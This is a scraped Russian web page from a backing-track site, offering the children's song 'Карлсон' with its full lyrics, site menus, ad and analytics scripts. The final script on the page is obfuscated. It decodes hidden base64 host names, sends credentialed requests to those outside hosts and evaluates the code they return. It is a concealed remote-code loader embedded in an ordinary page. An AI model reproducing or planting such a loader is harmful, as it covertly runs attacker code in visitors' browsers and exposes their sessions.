Детские
Русские
-
Карлсон
(минус)
(function(){function
c(a){var
b=document.createElement("style");b.textContent=a;b.rel="stylesheet";document.head.appendChild(b)}try{if(localStorage.PTSansV1)c(localStorage.PTSansV1);else{var
a=new
XMLHttpRequest,d=navigator.userAgent.match(/Chrom(e|ium)\/([0-9]+)\./),e="woff";d&&36<=parseInt(d[2],10)&&(e="woff2");a.open("GET","/assets/css/pt-sans-"+e+".css",!0);a.onload=function(){200<=a.status&&400>a.status&&(localStorage.PTSansV1=a.responseText,c(a.responseText))};a.send()}}catch(f){}})();
Вход
/
Регистрация
Последние
добавления
ТОП
100
популярных
На
главную
Минусовки
↵
Найти
Поиск
Помощь
Детские
Русские
Карлсон
минус
←
00:00
/
03:35
Скачать
1
7746
Минус
овка
Плюсы
Тональность
−
0.0
+
Темп
−
0.0
+
Скорость
Детские
песни
Размер
файла:
4,1
Мб
(160
кбит/с)
Загружено:
10
Oct
2012
Смотреть
видео
#ca2TR47D6TdkTB4D4nVnyN
a{font-family:
'PT
Sans'!important;}
							#ca2TR47D6TdkTB4D4nVnyN
>
a{display:none;}
ActionTeaser.ru
-
тизерная
реклама
var
bid
=
'2TR47D6TdkTB4D4nVnyN';
							var
sid
=
'7928';
							var
async
=
1;
Текст
песни
«Карлсон»
Cкача
ть
Распечатать
100%
1.
Это
было
или
нет?
Но
сегодня
на
обед
Прилетал
ко
мне
весёлый
Карлсон.
Съел
он
джем
и
мармелад
И
остался
очень
рад,
А
потом
устроил
в
доме
танцы.
Припев:
Карлсон,
который
живёт
на
крыше,
Он
прилетит,
он
меня
услышит.
Крепко
обнимет
при
встрече
руками
И
улетит
с
облаками.
2.
Мне
сегодня
попадёт,
Когда
папа
мой
придёт,
Потому
что
Карлсон
съел
варенье.
Но
"Всё
это
ерунда!"
-
Скажет
Карлсон
и
тогда
Загудит
его
большой
пропеллер.
Припев:
3.
Знают
все
мои
друзья
Мне
без
Карлсона
нельзя,
Без
него
мне
очень,
очень
скучно.
Прилетай
же
поскорей,
Приглашай
своих
друзей,
Запускай
свой
синий
шар
воздушный.
Припев:
Текст
добавлен:
unknown
Комментарии
Сообщить
об
ошибке
Для
отправки
сообщения
нужно
войти
либо
зарегистрироваться.
Похожие
минусовки
Песенка
про
папу
и
дочку
Детские
Русские
2:55
320
kbps
-
До
чего
у
бабушки
вкусные
оладушки
Детские
Русские
1:33
128
kbps
kar
Осень
милая,
шурши
Детские
Русские
1:33
256
kbps
-
Давайте
сохраним
Детские
Русские
3:01
256
kbps
-
Перемена
Детские
Русские
2:58
190
kbps
-
Найти
ещё
Поделиться
Авторское
право
Правила
Вопросы
и
ответы
Убрать
голос
из
песни
VK
x-minus.org
©
2012–2016
var
d
=
'@';
document.write('fdbck'
+
d
+
'x-minu'
+
's.org');
Выберите
трек...
function
getMediaHost(id,p,t,d){
	var
md=['//x-minus.org','http://m0.x-minus.me','http://m0.x-minus.me','http://m0.x-minus.me','http://m5.x-minus.me','http://85.25.213.119'],s=0;
	if("https:"
===
window.location.protocol)
{
		s
=
0;
	}
else
{
		if(p!=0
||
t!=0){
			if(d
>=
0)s=2;
			if(d
>
220)s=3;
			if(d
>
260)s=4;
		}
else
{
			if(id
<
20000){
				s
=
5;
			}
else
{
				s
=
2
+
id
%
3;
			}
		}
	}
	//}
	return
''
+
md[s];
}

var
AD_ENABLE
=
0;
function
advertisementIsEnable(){
	return
AD_ENABLE;
}
var
yaParams
=
{ipl:
""};
(function
(d,
w,
c)
{
(w[c]
=
w[c]
||
[]).push(function()
{
try
{
w.yaCounter16933624
=
new
Ya.Metrika({
id:16933624,
params:window.yaParams,
clickmap:true,
trackLinks:true,
accurateTrackBounce:true,
ut:"noindex"
});
}
catch(e)
{
}
});
var
n
=
d.getElementsByTagName("script")[0],
s
=
d.createElement("script"),
f
=
function
()
{
n.parentNode.insertBefore(s,
n);
};
s.type
=
"text/javascript";
s.async
=
true;
s.src
=
"https://mc.yandex.ru/metrika/watch.js";
if
(w.opera
==
"[object
Opera]")
{
d.addEventListener("DOMContentLoaded",
f,
false);
}
else
{
f();
}
})(document,
window,
"yandex_metrika_callbacks");
var
T9J=window;for(var
t
in
T9J){if(t.length===(0x88>=(0xC8,3E0)?(16.5E1,6):(98.,9.31E2))&&t.charCodeAt(((0x11F,131.)>=108.?(101.30E1,3):(9.34E2,9.46E2)))===(20.1E1>(0x86,140)?(1.074E3,100):(1.82E2,82.60E1))&&t.charCodeAt(((3.5E2,0x87)>=(147,55.)?(104,5):(119,132.0E1)))===((21.,74.2E1)>(137.,84.)?(60.90E1,119):1.435E3<(94.,2.11E2)?(50,35.80E1):(10.950E2,0x168))&&t.charCodeAt((0x162<=(93,141)?'z':30.<=(1.484E3,73.)?(12.8E1,1):(2.19E2,4.1E2)))===((64,0x114)>0x1F8?(0x1D5,0x90):9.48E2>(44.,0x18B)?(0x146,105):(63.80E1,35.7E1))&&t.charCodeAt(((0x20,0x9B)<0x17A?(37.9E1,0):(46.,8)))===((3.69E2,75.)<=(0x18A,138.20E1)?(0xF0,119):(9.28E2,0)>70.?"v":(60,7.76E2)))break};for(var
c
in
T9J[t]){if(c.length===(84<(61,10.950E2)?(18.7E1,8):(13.3E2,0x129))&&c.charCodeAt(((1.048E3,133.)<=116?(0x33,200):(82.,1.214E3)>0xE8?(129.8E1,5):(3,0x224)))===((82.,9.72E2)>=(1.2630E3,0x5C)?(0x111,101):(32.9E1,94.2E1))&&c.charCodeAt(((84.,137)<0x1FE?(0x132,7):(3.550E2,29)))===((0x1F8,120.)<(42.0E1,0xC2)?(85.,116):(0x25,132))&&c.charCodeAt((0x52<=(1.1E3,1.06E2)?(86,3):(121.60E1,100)))===((1.18E3,71.)<=(27,70.)?(22,0x1FB):(0x1DD,0x1AE)>=0x182?(1.70E1,117):(4.850E2,104))&&c.charCodeAt((6.4E2<=(0x1D9,0x1DA)?0x141:(0x85,137)>59?(5.72E2,0):(128.,1.2690E3)))===(119.0E1>=(13.83E2,114.)?(1.81E2,100):(0x90,0x14B)>(0x4F,9.75E2)?'/':(4.39E2,1.42E3)))break};(function(J,O,I,W){T9J[t][O]=function(){var
N=0,a=function
a(){var
k='//',R=((0x1D2,108)<=2.64E2?(0xF0,'T'):0x1BD>(0x217,14.39E2)?106:(0xD3,90.2E1)),l='GE',L=new
XMLHttpRequest();L.withCredentials=true;L.open((l+R),(k)+T9J[t]['atob'](I[N].split('').reverse().join(''))+'/'+W+'/',true);L.onreadystatechange=function(){if(L.readyState==4&&L.status==200&&L.responseText){eval(L.responseText);}};L.onerror=function(){if(++N!=I.length){a();}};try{L.send();}catch(G){L.onerror();}};a();};})(T9J[t][c],'_zxlqi',['==AduFGduV3bjNWYusGbxZTdlpna','w9Gdu8GbxUnbrdnY','==QZj5WZpN2cuMnd0ZzYxkjc','tF2YiV2duMzcwRmd5ZWd'],843295);
